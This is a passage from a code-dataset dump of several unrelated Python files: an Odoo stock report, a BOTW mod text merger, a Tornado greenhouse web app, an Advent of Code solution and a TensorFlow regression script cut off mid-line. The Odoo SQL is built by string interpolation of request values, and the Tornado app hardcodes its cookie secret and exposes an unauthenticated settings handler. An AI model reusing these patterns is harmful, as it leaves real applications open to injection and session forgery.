currency_code,\n i.id AS invoice_id,\n i.type AS invoice_type,\n i.number AS invoice_number,\n p.name AS partner_name,\n a.name AS aname,\n a.code AS acode, prd.name_template AS pproduct, prd.id AS prodid\n FROM account_move_line l\n JOIN account_move m on (l.move_id=m.id)\n LEFT JOIN product_product prd on (l.product_id=prd.id)\n LEFT JOIN account_analytic_account aa on (l.analytic_account_id=aa.id)\n LEFT JOIN account_account a on (l.account_id=a.id)\n LEFT JOIN res_currency c on (l.currency_id=c.id)\n LEFT JOIN res_partner p on (l.partner_id=p.id)\n LEFT JOIN account_invoice i on (m.id =i.move_id)\n LEFT JOIN account_period per on (per.id=l.period_id)\n JOIN account_journal j on (l.journal_id=j.id) \n WHERE %s AND l.product_id = %s AND l.date between '%s' and '%s' AND l.account_id in (795, 796, 797, 798, 799, 800, 801, 802, 803) ORDER by %s\n \"\"\" %(self.query, product, data['date'], data['date_end'], sql_sort)\n self.cr.execute(sql)\n res_lines = self.cr.dictfetchall()\n res_init = []\n #print \"sql\",sql\n# if self.init_balance:\n# sql = \"\"\"\n# SELECT 0 AS lid, '' AS ldate, '' AS lcode, COALESCE(SUM(l.amount_currency),0.0) AS amount_currency, 'Saldo Awal' AS lref, 'Saldo Awal' AS lname, \n# COALESCE(SUM(l.debit),0.0) AS debit, COALESCE(SUM(l.credit),0.0) AS credit, '' AS lperiod_id, '' AS lpartner_id,\n# '' AS move_name, '' AS mmove_id, '' AS period_code, '' AS aaname, '' AS aname, '' AS acode,\n# '' AS currency_code,\n# NULL AS currency_id,\n# '' AS invoice_id, '' AS invoice_type, '' AS invoice_number,\n# '' AS partner_name, '' AS pproduct,\n# (SELECT COALESCE(sum(ll.quantity)) FROM account_move_line ll WHERE %s AND ll.debit > 0 AND ll.credit = 0 AND ll.account_id = %%s AND ll.move_id IN (SELECT id FROM account_move WHERE date < '%s') AND ll.product_id = %s) AS lqty_in, \n# (SELECT COALESCE(sum(ll.quantity)) FROM account_move_line ll WHERE %s AND ll.credit > 0 AND ll.debit = 0 AND ll.account_id = %%s AND ll.move_id IN (SELECT id FROM account_move WHERE date < '%s') AND ll.product_id = %s) AS lqty_out \n# FROM account_move_line l\n# LEFT JOIN account_move m on (l.move_id=m.id)\n# LEFT JOIN product_product prd on (l.product_id=prd.id)\n# LEFT JOIN res_currency c on (l.currency_id=c.id)\n# LEFT JOIN res_partner p on (l.partner_id=p.id)\n# LEFT JOIN account_invoice i on (m.id =i.move_id)\n# JOIN account_journal j on (l.journal_id=j.id) AND j.code != 'OBJ' \n# WHERE %s AND l.account_id = %%s AND l.move_id IN (SELECT id FROM account_move WHERE date 
< '%s') AND l.product_id = %s\n# \"\"\" %(self.init_in_query, data['date'], product, self.init_out_query, data['date'], product, self.init_query, data['date'], product)\n# self.cr.execute(sql, (account.id,account.id,account.id))\n# res_init = self.cr.dictfetchall() \n if res_init:\n res = res_init + res_lines\n else:\n res = res_lines\n account_sum = saldo_sum = 0.0\n #awal = account['lqty_in']\n for l in res:\n #print '=====>>>>======',l['pproduct'] \n# move_line_obj = self.pool.get('account.move.line')\n stock_picking_obj = self.pool.get('stock.picking')\n stock_move_obj = self.pool.get('stock.move')\n product_obj = self.pool.get('product.product')\n product_standard_obj = self.pool.get('product.standard.price')\n# move_line_ids = move_line_obj.search(self.cr, self.uid, [('move_id','=',l['mmove_id']),('account_id','!=',account)])\n# line_move_ids = []\n# for line_move in move_line_obj.browse(self.cr, self.uid, move_line_ids):\n# #l['lorigin'] = line_move.invoice and line_move.invoice.origin or ''\n# line_move_ids.append(line_move.account_id.name)\n \n l['lorigin'] = ''\n l['llocation'] = ''\n picking_ids = stock_picking_obj.search(self.cr, self.uid, [('name','=',l['lref'])])\n move_ids = stock_move_obj.search(self.cr, self.uid, [('name','=',l['lname'])])\n if picking_ids:\n for pick in stock_picking_obj.browse(self.cr, self.uid, picking_ids):\n if pick.move_lines:\n for move in pick.move_lines:\n l['llocation'] = move.location_id and move.location_id.name\n l['lorigin'] = pick.sale_id and pick.sale_id.name\n elif move_ids:\n for stock in stock_move_obj.browse(self.cr, self.uid, move_ids):\n l['llocation'] = stock.location_id and stock.location_id.name\n l['lref'] = l['lname']\n #l['standard_price'] = stock.product_id.standard_price\n #l['lorigin'] = l['lname']\n #print \"move_line\",move_line,l['lorigin'],l['lid']\n #print \"line_move_ids\",l['mmove_id'],\", \".join(line_move_ids)\n #l['pproduct'] = l['pproduct']\n #l['lref'] = l['lref'] or l['lname']\n l['product_awal'] = ''#(l['debit'] > 0 and l['lqty_in']) - (l['credit'] > 0 and l['lqty_out'])\n l['product_masuk'] = (l['debit'] > 0 and l['lqty_in']) or (l['debit']-l['credit']) == 0 and 'IN/' in l['lref'] and l['lqty_in']\n l['product_keluar'] = (l['credit'] > 0 and l['lqty_out']) or (l['debit']-l['credit']) == 0 and 'OUT/' in l['lref'] and l['lqty_out']\n account_sum+=(l['product_masuk'] - l['product_keluar'])\n product = product_obj.browse(self.cr, self.uid, l['prodid'])\n #print \"=================\",product.standard_price,account_sum+account['product_awal']\n l['product_akhir'] = (account['product_awal'])+account_sum#\\\\l['lqty_in'] - l['product_masuk'] - l['product_keluar']\n \n l['saldo_awal'] = ''#l['debit'] - l['credit']\n l['saldo_masuk'] = l['debit'] > 0 and l['debit']\n l['saldo_keluar'] = l['credit'] > 0 and l['credit']\n saldo_sum+=(l['saldo_masuk'] - l['saldo_keluar'])\n l['saldo_akhir'] = (account['saldo_awal'])+saldo_sum#l['saldo_awal'] + l['saldo_masuk'] - l['saldo_keluar']\n# if 'IN/' in l['lref']:\n# standard_ids = product_standard_obj.search(self.cr, self.uid, [('product_tmpl_id','=',product.product_tmpl_id.id)])\n# if not standard_ids:\n# if l['product_akhir'] != 0.0:\n# standard_price = (((l['product_akhir']-l['product_masuk'])*product.standard_price)+l['saldo_masuk'])/l['product_akhir']\n# else:\n# standard_price = product.standard_price\n# values_create= {\n# 'name': l['ldate'],\n# 'product_tmpl_id': product.product_tmpl_id and product.product_tmpl_id.id,\n# 'standard_price': standard_price,\n# }\n# print 
\"---------create_new---------\",values_create\n# #product_standard_obj.create(self.cr, self.uid, values_create)\n# #print \"=================\",(((l['product_akhir']-l['product_masuk'])*product.standard_price)+l['saldo_masuk'])/l['product_akhir']#product.standard_price,account_sum+account['product_awal'],l['product_masuk'],l['saldo_masuk']\n# elif standard_ids:\n# standard_ids = product_standard_obj.search(self.cr, self.uid, [('name','!=',l['ldate']),('product_tmpl_id','=',product.product_tmpl_id.id)])\n# standard_duplicate_ids = product_standard_obj.search(self.cr, self.uid, [('name','=',l['ldate']),('product_tmpl_id','=',product.product_tmpl_id.id)])\n# if standard_ids:\n# standard_last_ids = product_standard_obj.search(self.cr, self.uid, [('product_tmpl_id','=',product.product_tmpl_id.id)], limit=1, order='name DESC')\n# standard_last = product_standard_obj.browse(self.cr, self.uid, standard_last_ids[0])\n# if l['product_akhir'] != 0.0:\n# standard_price = (((l['product_akhir']-l['product_masuk'])*standard_last.standard_price)+l['saldo_masuk'])/l['product_akhir']\n# else:\n# standard_price = standard_last.standard_price\n# values_add= {\n# 'name': l['ldate'],\n# 'product_tmpl_id': product.product_tmpl_id and product.product_tmpl_id.id,\n# 'standard_price': standard_price,\n# }\n# if not standard_duplicate_ids:\n# print \"-----ini-----(((\",l['product_akhir'],\"-\",l['product_masuk'],\")*\",standard_last.standard_price,\")+\",l['saldo_masuk'],\")/\",l['product_akhir']\n# print \"------add------\",values_add\n# #product_standard_obj.create(self.cr, self.uid, values_add)\n# l['move'] = l['move_name'] != '/' and l['move_name'] or (str(l['mmove_id']))\n# #l['faktur_pajak_no'] = l['faktur_pajak_no'] or ''\n# l['partner'] = l['partner_name'] or ''\n# l['aaname'] = l['aaname'] or ''\n# l['aname'] = l['aname'] or ''\n# l['lacc'] = ''\n# if line_move_ids:\n# l['lacc'] = \", \".join(line_move_ids)\n# l['acode'] = l['acode'] or ''\n# account_sum += l['debit'] - l['credit']\n# l['progress'] = account_sum\n# #l['line_corresp'] = l['mmove_id'] == '' and ' ' or counterpart_accounts[l['mmove_id']].replace(', ',',')\n# # Modification of amount Currency\n# if l['credit'] > 0:\n# if l['amount_currency'] != None:\n# l['amount_currency'] = abs(l['amount_currency']) * -1\n #print \"res-----------\",res\n return res\n","sub_path":"ad_laporan_management/report/report_stock_management.py","file_name":"report_stock_management.py","file_ext":"py","file_size_in_byte":27155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"29747728","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nclass Gan:\n \"\"\"\n 甘特图单条事务对象\n \"\"\"\n def __init__(self, start_time, end_time, state_code, hover_info):\n \"\"\"\n :param start_time: 开始时间,13位时间戳,int\n :param end_time: 结束时间,13位时间戳,int\n :param state_code: 状态码,自定义,int\n :param hover_info: 事务对象更多信息,自定义,dict\n \"\"\"\n self.start_time = start_time\n self.end_time = end_time\n self.state = state_code\n self.hover_info = hover_info","sub_path":"data/gantt.py","file_name":"gantt.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"545752996","text":"\"\"\"Provides functions for diffing and merging BotW game text files\"\"\"\r\n# Copyright 2020 Nicene Nerd \r\n# Licensed under GPLv3+\r\nimport json\r\nimport multiprocessing\r\nimport subprocess\r\nfrom functools import partial, lru_cache\r\nfrom pathlib import Path\r\nfrom 
platform import system\r\nfrom tempfile import TemporaryDirectory, NamedTemporaryFile\r\nfrom typing import List, Union, ByteString\r\n\r\nimport oead\r\nimport xxhash\r\n\r\nfrom bcml import mergers, util\r\nfrom bcml.util import get_7z_path\r\n\r\nEXCLUDE_TEXTS = [\r\n \"ErrorMessage\",\r\n \"StaffRoll\",\r\n \"LayoutMsg/MessageTipsRunTime_00\",\r\n \"LayoutMsg/OptionWindow_00\",\r\n \"LayoutMsg/SystemWindow_00\",\r\n]\r\n\r\nLANGUAGES = [\r\n \"USen\",\r\n \"EUen\",\r\n \"USfr\",\r\n \"USes\",\r\n \"EUde\",\r\n \"EUes\",\r\n \"EUfr\",\r\n \"EUit\",\r\n \"EUnl\",\r\n \"EUru\",\r\n \"CNzh\",\r\n \"JPja\",\r\n \"KRko\",\r\n \"TWzh\",\r\n]\r\n\r\nMSYT_PATH = str(\r\n util.get_exec_dir()\r\n / \"helpers\"\r\n / \"msyt{}\".format(\".exe\" if system() == \"Windows\" else \"\")\r\n)\r\n\r\n\r\n@lru_cache(2)\r\ndef get_text_hashes(language: str = None) -> {}:\r\n hashes = json.loads(\r\n util.decompress(\r\n (util.get_exec_dir() / \"data\" / \"hashes\" / \"msyts.sjson\").read_bytes()\r\n ).decode(\"utf8\")\r\n )\r\n if language:\r\n return hashes[language if not language.endswith(\"en\") else \"XXen\"]\r\n else:\r\n return hashes\r\n\r\n\r\ndef match_language(lang: str, log_dir: Path) -> str:\r\n logged_langs = set([util.get_file_language(l) for l in log_dir.glob(\"*texts*\")])\r\n if lang in logged_langs:\r\n return lang\r\n elif lang[2:4] in [l[2:4] for l in logged_langs]:\r\n return [l for l in logged_langs if l[2:4] == lang[2:4]][0]\r\n else:\r\n return [l for l in LANGUAGES if l in logged_langs][0]\r\n\r\n\r\ndef msbt_to_msyt(folder: Path, pool: multiprocessing.Pool = None):\r\n \"\"\" Converts MSBTs in given temp dir to MSYTs \"\"\"\r\n if system() == \"Windows\":\r\n subprocess.run(\r\n [MSYT_PATH, \"export\", \"-d\", str(folder)],\r\n creationflags=util.CREATE_NO_WINDOW,\r\n check=False,\r\n )\r\n else:\r\n subprocess.run([MSYT_PATH, \"export\", \"-d\", str(folder)], check=False)\r\n fix_msbts = [\r\n msbt\r\n for msbt in folder.rglob(\"**/*.msbt\")\r\n if not msbt.with_suffix(\".msyt\").exists()\r\n ]\r\n if fix_msbts:\r\n print(\"Some MSBTs failed to convert. Trying again individually...\")\r\n this_pool = pool or multiprocessing.Pool(maxtasksperchild=500)\r\n this_pool.map(partial(_msyt_file), fix_msbts)\r\n fix_msbts = [\r\n msbt\r\n for msbt in folder.rglob(\"**/*.msbt\")\r\n if not msbt.with_suffix(\".msyt\").exists()\r\n ]\r\n if not pool:\r\n this_pool.close()\r\n this_pool.join()\r\n if fix_msbts:\r\n print(\r\n f\"{len(fix_msbts)} MSBT files failed to convert. 
They will not be merged.\"\r\n )\r\n util.vprint(fix_msbts)\r\n for msbt_file in folder.rglob(\"**/*.msbt\"):\r\n Path(msbt_file).unlink()\r\n return fix_msbts\r\n\r\n\r\ndef _msyt_file(file, output: Path = None):\r\n m_args = [MSYT_PATH, \"export\", str(file)]\r\n if output:\r\n m_args += [\"--output\", str(output)]\r\n if system() == \"Windows\":\r\n result = subprocess.run(\r\n m_args,\r\n creationflags=util.CREATE_NO_WINDOW,\r\n capture_output=True,\r\n text=True,\r\n check=False,\r\n )\r\n else:\r\n result = subprocess.run(m_args, capture_output=True, text=True, check=False)\r\n if result.stderr:\r\n raise ValueError(\r\n f\"The MSBT file {file} could not be read.\"\r\n \"Please contact the mod developer for assistance.\"\r\n ) from RuntimeError(\r\n (\r\n result.stderr.replace(\"an error occurred - see below for details\", \"\")\r\n .replace(\"\\n\", \" \")\r\n .capitalize()\r\n )\r\n )\r\n\r\n\r\ndef read_msbt(file: Union[Path, ByteString]):\r\n tmp_file = Path(NamedTemporaryFile(suffix=\".msyt\").name)\r\n if not isinstance(file, Path):\r\n tmp_file.with_suffix(\".msbt\").write_bytes(file)\r\n file = tmp_file.with_suffix(\".msbt\")\r\n _msyt_file(file, tmp_file)\r\n tmp_text = tmp_file.read_text(\"utf-8\")\r\n tmp_file.unlink()\r\n return json.loads(tmp_text)\r\n\r\n\r\ndef extract_refs(language: str, tmp_dir: Path, files: set = None):\r\n x_args = [\r\n get_7z_path(),\r\n \"x\",\r\n str(util.get_exec_dir() / \"data\" / \"text_refs.7z\"),\r\n f'-o{str(tmp_dir / \"refs\")}',\r\n ]\r\n if files:\r\n x_args.extend(files)\r\n else:\r\n x_args.append(language)\r\n result: subprocess.CompletedProcess\r\n if system() == \"Windows\":\r\n result = subprocess.run(\r\n x_args,\r\n capture_output=True,\r\n creationflags=util.CREATE_NO_WINDOW,\r\n check=False,\r\n text=True,\r\n )\r\n else:\r\n result = subprocess.run(x_args, capture_output=True, text=True, check=False)\r\n if result.stderr:\r\n raise RuntimeError(result.stderr)\r\n\r\n\r\ndef diff_msyt(msyt: Path, hashes: dict, mod_out: Path, ref_dir: Path):\r\n diff = {}\r\n filename = msyt.relative_to(mod_out).as_posix()\r\n if any(ex in filename for ex in EXCLUDE_TEXTS):\r\n msyt.unlink()\r\n return {}\r\n data = msyt.read_bytes()\r\n xxh = xxhash.xxh64_intdigest(data)\r\n if filename in hashes and hashes[filename] == xxh:\r\n pass\r\n else:\r\n text = data.decode(\"utf8\")\r\n if filename not in hashes:\r\n diff[filename] = json.loads(text)[\"entries\"]\r\n else:\r\n ref_text = (ref_dir / filename).read_text(\"utf-8\")\r\n if \"\".join(text.split()) != \"\".join(ref_text.split()):\r\n ref_contents = json.loads(ref_text)\r\n contents = json.loads(text)\r\n diff[filename] = {\r\n entry: value\r\n for entry, value in contents[\"entries\"].items()\r\n if (\r\n entry not in ref_contents[\"entries\"]\r\n or value != ref_contents[\"entries\"][entry]\r\n )\r\n }\r\n else:\r\n pass\r\n del ref_text\r\n del text\r\n msyt.unlink()\r\n del data\r\n return diff\r\n\r\n\r\ndef diff_language(bootup: Path, pool: multiprocessing.Pool = None) -> {}:\r\n diff = {}\r\n language = bootup.name[7:-5]\r\n bootup_sarc = oead.Sarc(bootup.read_bytes())\r\n msg_sarc = oead.Sarc(\r\n util.decompress(\r\n bootup_sarc.get_file(f\"Message/Msg_{language}.product.ssarc\").data\r\n )\r\n )\r\n\r\n with TemporaryDirectory() as tmp:\r\n tmp_dir = Path(tmp)\r\n mod_out = tmp_dir / \"mod\"\r\n print(\"Extracting mod texts...\")\r\n for file in msg_sarc.get_files():\r\n out = mod_out / file.name\r\n out.parent.mkdir(parents=True, exist_ok=True)\r\n out.write_bytes(file.data)\r\n 
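# All mod text files have been extracted from the SARC; release it to free memory.\r\n        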
del msg_sarc\r\n\r\n print(\"Converting texts to MSYT...\")\r\n msbt_to_msyt(mod_out, pool=pool)\r\n hashes = get_text_hashes(language)\r\n ref_lang = \"XXen\" if language.endswith(\"en\") else language\r\n print(\"Extracting reference texts...\")\r\n extract_refs(ref_lang, tmp_dir)\r\n ref_dir = tmp_dir / \"refs\" / ref_lang\r\n\r\n this_pool = pool or multiprocessing.Pool(maxtasksperchild=500)\r\n print(\"Identifying modified text files...\")\r\n results = this_pool.map(\r\n partial(diff_msyt, ref_dir=ref_dir, hashes=hashes, mod_out=mod_out),\r\n mod_out.rglob(\"**/*.msyt\"),\r\n )\r\n if not pool:\r\n this_pool.close()\r\n this_pool.join()\r\n for result in results:\r\n diff.update(result)\r\n return diff\r\n\r\n\r\ndef merge_msyt(file_data: tuple, tmp_dir: Path):\r\n filename: str = file_data[0]\r\n changes: dict = file_data[1]\r\n out = tmp_dir / filename\r\n if out.exists():\r\n text_data = json.loads(out.read_text(\"utf-8\"))\r\n text_data[\"entries\"].update(changes)\r\n out.write_text(json.dumps(text_data, ensure_ascii=False), encoding=\"utf-8\")\r\n else:\r\n out.parent.mkdir(parents=True, exist_ok=True)\r\n out.write_text(\r\n json.dumps(\r\n {\r\n \"group_count\": len(changes),\r\n \"atr1_unknown\": 0 if \"EventFlowMsg\" not in filename else 4,\r\n \"entries\": changes,\r\n },\r\n ensure_ascii=False,\r\n ),\r\n encoding=\"utf-8\",\r\n )\r\n\r\n\r\nclass TextsMerger(mergers.Merger):\r\n # pylint: disable=abstract-method\r\n \"\"\" A merger for game texts \"\"\"\r\n NAME: str = \"texts\"\r\n\r\n def __init__(self, all_langs: bool = False):\r\n super().__init__(\r\n \"game texts\",\r\n \"Merges changes to game texts\",\r\n \"texts.json\",\r\n options={\"all_langs\": all_langs},\r\n )\r\n\r\n def generate_diff(self, mod_dir: Path, modded_files: List[Union[str, Path]]):\r\n print(\"Checking for modified languages...\")\r\n languages = {\r\n util.get_file_language(file)\r\n for file in modded_files\r\n if (\r\n isinstance(file, Path)\r\n and \"Bootup_\" in file.name\r\n and \"Graphic\" not in file.name\r\n )\r\n }\r\n if not languages:\r\n return None\r\n util.vprint(f'Languages: {\",\".join(languages)}')\r\n\r\n language_map = {}\r\n save_langs = (\r\n LANGUAGES\r\n if self._options.get(\"all_langs\", False)\r\n else [util.get_settings(\"lang\")]\r\n )\r\n for lang in save_langs:\r\n if lang in languages:\r\n language_map[lang] = lang\r\n elif lang[2:4] in [l[2:4] for l in languages]:\r\n language_map[lang] = [l for l in languages if l[2:4] == lang[2:4]][0]\r\n else:\r\n language_map[lang] = [l for l in LANGUAGES if l in languages][0]\r\n util.vprint(f\"Language map:\")\r\n util.vprint(language_map)\r\n\r\n language_diffs = {}\r\n for language in set(language_map.values()):\r\n print(f\"Logging text changes for {language}...\")\r\n language_diffs[language] = diff_language(\r\n mod_dir / util.get_content_path() / \"Pack\" / f\"Bootup_{language}.pack\",\r\n pool=self._pool,\r\n )\r\n\r\n return {\r\n save_lang: language_diffs[map_lang]\r\n for save_lang, map_lang in language_map.items()\r\n }\r\n\r\n def log_diff(self, mod_dir: Path, diff_material):\r\n if isinstance(diff_material, List):\r\n diff_material = self.generate_diff(mod_dir, diff_material)\r\n if diff_material:\r\n (mod_dir / \"logs\" / self._log_name).write_text(\r\n json.dumps(diff_material, ensure_ascii=False, indent=2),\r\n encoding=\"utf-8\",\r\n )\r\n\r\n def get_mod_diff(self, mod: util.BcmlMod):\r\n diff = {}\r\n if self.is_mod_logged(mod):\r\n util.dict_merge(\r\n diff,\r\n json.loads((mod.path / \"logs\" / 
self._log_name).read_text(\"utf-8\")),\r\n )\r\n for opt in {d for d in (mod.path / \"options\").glob(\"*\") if d.is_dir()}:\r\n if (opt / \"logs\" / self._log_name).exists():\r\n util.dict_merge(\r\n diff,\r\n json.loads((opt / \"logs\" / self._log_name).read_text(\"utf-8\")),\r\n overwrite_lists=True,\r\n )\r\n return diff\r\n\r\n def get_mod_edit_info(self, mod: util.BcmlMod) -> set:\r\n diffs = set()\r\n if self.is_mod_logged(mod):\r\n for files in self.get_mod_diff(mod).values():\r\n diffs |= set(files.keys())\r\n return diffs\r\n\r\n def get_all_diffs(self):\r\n diffs = []\r\n for mod in util.get_installed_mods():\r\n diff = self.get_mod_diff(mod)\r\n if diff:\r\n diffs.append(diff)\r\n return diffs\r\n\r\n def consolidate_diffs(self, diffs: list):\r\n if not diffs:\r\n return {}\r\n main_diff = diffs[0]\r\n for diff in diffs[1:]:\r\n for lang, content in diff.items():\r\n if lang not in main_diff:\r\n main_diff[lang] = content\r\n else:\r\n for file, entries in content.items():\r\n if file not in main_diff[lang]:\r\n main_diff[lang][file] = entries\r\n else:\r\n for entry, msg in entries.items():\r\n main_diff[lang][file][entry] = msg\r\n return main_diff\r\n\r\n @util.timed\r\n def perform_merge(self):\r\n # pylint: disable=unsupported-assignment-operation\r\n langs = (\r\n {util.get_settings(\"lang\")}\r\n if not self._options[\"all_langs\"]\r\n else util.get_user_languages()\r\n )\r\n for lang in langs:\r\n print(\"Loading text mods...\")\r\n diffs = self.consolidate_diffs(self.get_all_diffs())\r\n if not diffs or lang not in diffs:\r\n print(\"No text merge necessary\")\r\n for bootup in util.get_master_modpack_dir().rglob(\r\n \"**/Bootup_????.pack\"\r\n ):\r\n bootup.unlink()\r\n return\r\n util.vprint(\r\n {\r\n lang: {\r\n file: list(entries.keys())\r\n for file, entries in diffs[lang].items()\r\n }\r\n }\r\n )\r\n\r\n print(f\"Merging modded texts for {lang}...\")\r\n saved_files = set()\r\n with TemporaryDirectory() as tmp:\r\n tmp_dir = Path(tmp)\r\n ref_lang = \"XXen\" if lang.endswith(\"en\") else lang\r\n extract_refs(ref_lang, tmp_dir)\r\n tmp_dir = tmp_dir / \"refs\" / ref_lang\r\n this_pool = self._pool or multiprocessing.Pool(maxtasksperchild=500)\r\n this_pool.map(partial(merge_msyt, tmp_dir=tmp_dir), diffs[lang].items())\r\n if not self._pool:\r\n this_pool.close()\r\n this_pool.join()\r\n\r\n m_args = [\r\n MSYT_PATH,\r\n \"create\",\r\n \"-d\",\r\n str(tmp_dir),\r\n \"-p\",\r\n \"wiiu\" if util.get_settings(\"wiiu\") else \"switch\",\r\n \"-o\",\r\n str(tmp_dir),\r\n ]\r\n result: subprocess.CompletedProcess\r\n if system() == \"Windows\":\r\n result = subprocess.run(\r\n m_args,\r\n capture_output=True,\r\n creationflags=util.CREATE_NO_WINDOW,\r\n check=False,\r\n text=True,\r\n )\r\n\r\n else:\r\n result = subprocess.run(\r\n m_args,\r\n capture_output=True,\r\n check=False,\r\n text=True,\r\n )\r\n if result.stderr:\r\n raise RuntimeError(\r\n f\"There was an error merging game texts. 
{result.stderr}\"\r\n )\r\n\r\n msg_sarc = oead.SarcWriter(\r\n endian=oead.Endianness.Big\r\n if util.get_settings(\"wiiu\")\r\n else oead.Endianness.Little\r\n )\r\n for file in tmp_dir.rglob(\"**/*.msbt\"):\r\n msg_sarc.files[\r\n file.relative_to(tmp_dir).as_posix()\r\n ] = file.read_bytes()\r\n saved_files.add(file.relative_to(tmp_dir).as_posix())\r\n bootup_sarc = oead.SarcWriter(\r\n endian=oead.Endianness.Big\r\n if util.get_settings(\"wiiu\")\r\n else oead.Endianness.Little\r\n )\r\n bootup_sarc.files[f\"Message/Msg_{lang}.product.ssarc\"] = util.compress(\r\n msg_sarc.write()[1]\r\n )\r\n\r\n bootup_path = (\r\n util.get_master_modpack_dir()\r\n / util.get_content_path()\r\n / \"Pack\"\r\n / f\"Bootup_{lang}.pack\"\r\n )\r\n bootup_path.parent.mkdir(parents=True, exist_ok=True)\r\n bootup_path.write_bytes(bootup_sarc.write()[1])\r\n del bootup_sarc\r\n del msg_sarc\r\n print(f\"{lang} texts merged successfully\")\r\n\r\n def get_checkbox_options(self) -> List[tuple]:\r\n return [\r\n (\"all_langs\", \"Merge texts for all game languages\"),\r\n ]\r\n","sub_path":"bcml/mergers/texts.py","file_name":"texts.py","file_ext":"py","file_size_in_byte":16902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"386869217","text":"from core.core import Core\nimport tornado.auth\nimport tornado.escape\nimport tornado.ioloop\nimport tornado.options\nimport tornado.web\nimport tornado.process\nimport os.path\nfrom web import *\n\nDEBUG = False\ncore = Core(DEBUG)\n\n\nclass Application(tornado.web.Application):\n def __init__(self):\n handlers = [\n (r\"/\", main_handler.MainHandler, dict(co=core)),\n (r\"/enviroment\", enviromentdata_handler.EnviromentDataHandler, dict(co=core)),\n (r\"/shot\", PhotoHandler),\n (r\"/settings\", SettingsHandler),\n (r\"/power\", powerdata_handler.PowerDataHandler, dict(co=core)),\n (r\"/charts\", ChartsHandler),\n (r\"/reports\", report_handler.ReportHandler, dict(co=core))\n ]\n settings = dict(\n debug=DEBUG,\n cookie_secret=\"43oETzKXQAGaYdkL5gEmGeJJFuYh7EQnp2XdTP1o/Vo=\",\n template_path=os.path.join(os.path.dirname(__file__), \"templates\"),\n static_path=os.path.join(os.path.dirname(__file__), \"static\"),\n )\n tornado.web.Application.__init__(self, handlers, **settings)\n\n\n\nclass PhotoHandler(tornado.web.RequestHandler):\n def get(self):\n core.camera.snapshot()\n\nclass SettingsHandler(tornado.web.RequestHandler):\n def get(self):\n maxTemp = core.config.maxTemp()\n targetTemp = core.config.tgtTemp()\n ligt_start = core.config.light_start()\n light_hours = core.config.light_hours()\n self.render(\"settings.html\", title=\"Greenhouse\",\n max_temp=maxTemp, tgt_temp=targetTemp,\n light_start=ligt_start, light_hours=light_hours)\n\n def post(self):\n maxT = self.get_argument('maxTemperature')\n tgtT = self.get_argument('targetTemperature')\n hours = self.get_argument('lightHours')\n start = self.get_argument('startHour')\n core.config.maxTemp(maxT)\n core.wrapper.max(str(maxT))\n core.config.tgtTemp(tgtT)\n core.wrapper.target(str(tgtT))\n\n core.config.light_hours(hours)\n core.config.light_start(start)\n\n\nclass ChartsHandler(tornado.web.RequestHandler):\n\n def get(self):\n self.render(\"charts.html\", title=\"Greenhouse\")\n\n\nif __name__ == \"__main__\":\n core.start()\n app = Application()\n app.listen(8888)\n 
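# IOLoop.current().start() blocks here, serving requests until the loop is stopped.\n    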
tornado.ioloop.IOLoop.current().start()\n\n","sub_path":"Greenhouse_control/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"192422626","text":"#!/usr/bin/env python3\nimport re\n\nif __name__ == '__main__':\n with open('data.txt', 'r') as file:\n raw_data = file.read()\n\n raw_data = re.sub(r'[BR]', '1', raw_data)\n raw_data = re.sub(r'[FL]', '0', raw_data)\n data = raw_data.split(\"\\n\")[:-1]\n\n ids = set()\n \n for entry in data:\n row = int(entry[:7], base=2)\n col = int(entry[7:], base=2)\n ids.add(row * 8 + col)\n \n min_id = min(ids)\n max_id = max(ids)\n print(f\"Max: {max_id}\")\n\n all_ids = set(range(min_id, max_id))\n\n missing = all_ids - ids\n\n print(f\"Missing IDs: {missing}\")\n","sub_path":"day05.py","file_name":"day05.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"94164877","text":"# To support both python 2 and python 3\nfrom __future__ import division, print_function, unicode_literals\n\n# Common imports\nimport numpy as np\nimport tensorflow as tf\n\n\n# initialize variables/model parameters\nW = tf.Variable(tf.zeros([2, 1]), name=\"weights\")\nb = tf.Variable(0., name=\"bias\")\n\n# define the training phase operations\ndef inference(X):\n\t# how to in inference model over data X and predict Y\n\treturn tf.matmul(X, W) + b\n\n\ndef loss(X, Y):\n\t# MSE\n\tY_predicted = inference(X)\n\treturn tf.reduce_mean(tf.square(Y - Y_predicted))\n\n\ndef inputs():\n\tweight_age = [[84, 46], [73, 20], [65, 52], [70, 30], [76, 57], [69, 25], [63, 28], [72, 36], [79, 57], [75, 44], [27, 24], [89, 31], [65, 52], [57, 23], [59, 60], [69, 48], [60, 34], [79, 51], [75, 50], [82, 34], [59, 46], [67, 23], [85, 37], [55, 40], [63, 30]]\n\tblood_fat_content = [354, 190, 405, 263, 451, 302, 288, 385, 402, 365, 209, 290, 346, 254, 395, 434, 220, 374, 308, 220, 311, 181, 274, 303, 244]\n\n\treturn(tf.cast(weight_age, tf.float32), tf.cast(blood_fat_content, tf.float32))\n\n\ndef train(total_loss):\n\tlearning_rate = 0.0000001\n\treturn tf.train.GradientDescentOptimizer(learning_rate).minimize(total_loss)\n\n\ndef evaluate(sess, X, Y):\n\t# evaluate the resulting trained model\n\tprint(sess.run(inference([[80., 25.]])))\n\tprint(sess.run(inference([[65., 25.]])))\n\n\n# before 0.12\n#init = tf.initialize_all_variable()\n# after 0.12\ninit = tf.global_variables_initializer()\n\n# Create a saver to save model\nsaver = tf.train.Saver()\nmodel_path = \"models/linear_regression/lr\"\n\n\nwith tf.Session() as sess:\n\tsess.run(init)\n\n\t# get inputs\n\tX, Y = inputs()\n\n\t# get traing operation that will minimize the loss\n\ttotal_loss = loss(X, Y)\n\ttrain_op = train(total_loss)\n\n\t# prepare multi threads env\n\tcoord = tf.train.Coordinator()\n\tthreads = tf.train.start_queue_runners(sess=sess, coord=coord)\n\n\t## actual training \n\ttraining_steps = 1000\n\tfor step in range(training_steps):\n\t\tsess.run(train_op)\n\t\t# check loss\n\t\tif step % 10 == 0:\n\t\t\tprint(\"loss\", 